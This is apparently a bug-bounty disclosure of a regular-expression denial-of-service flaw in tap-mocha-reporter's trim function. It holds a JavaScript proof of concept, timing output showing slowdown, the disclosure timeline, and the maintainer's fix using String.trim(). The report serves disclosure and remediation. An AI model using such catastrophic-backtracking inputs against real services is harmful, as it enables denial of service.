Inefficient Regular Expression Complexity in tapjs/tap-mocha-reporter
Valid
Reported on
Sep 21st 2021
Description
I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in tap-mocha-reporter.
The ReDoS vulnerability is mainly due to the regex /^\s+|\s+$|/g and can be exploited with the following code.
Proof of Concept
// PoC.js
var tapMochaReporter = require("tap-mocha-reporter/lib/utils.js")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str ='a' +' '.repeat(i*10000)+"a";
tapMochaReporter.trim(attack_str);
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
The Output
"attack_str.length: 10002: 110 ms"
"attack_str.length: 20002: 408 ms"
"attack_str.length: 30002: 854 ms"
"attack_str.length: 40002: 1521 ms"
"attack_str.length: 50002: 2485 ms"
"attack_str.length: 60002: 3466 ms"
Occurrences
We created a
GitHub Issue
asking the maintainers to create a
SECURITY.md
2 years ago
We have contacted a member of the
tapjs/tap-mocha-reporter
team and are waiting to hear back
2 years ago
We have sent a
second
follow up to the
tapjs/tap-mocha-reporter
team.
We will try again in 10 days.
2 years ago
We have sent a
third and final
follow up to the
tapjs/tap-mocha-reporter
team.
This report is now considered stale.
2 years ago
I'm not sure how an attacker would ever manage to call this function, so this feels like a self-pwn, but point of fact, String.trim() is supported on all platforms that can run tap-mocha-reporter (and in fact, String.trim() is used elsewhere in the library), and that performs much better anyway. Fixed on https://github.com/tapjs/tap-mocha-reporter/commit/50c8c31ed7f6ebf18de4339ee0e64b1558b07e83
utils.js#L261
has been validated
to join this conversation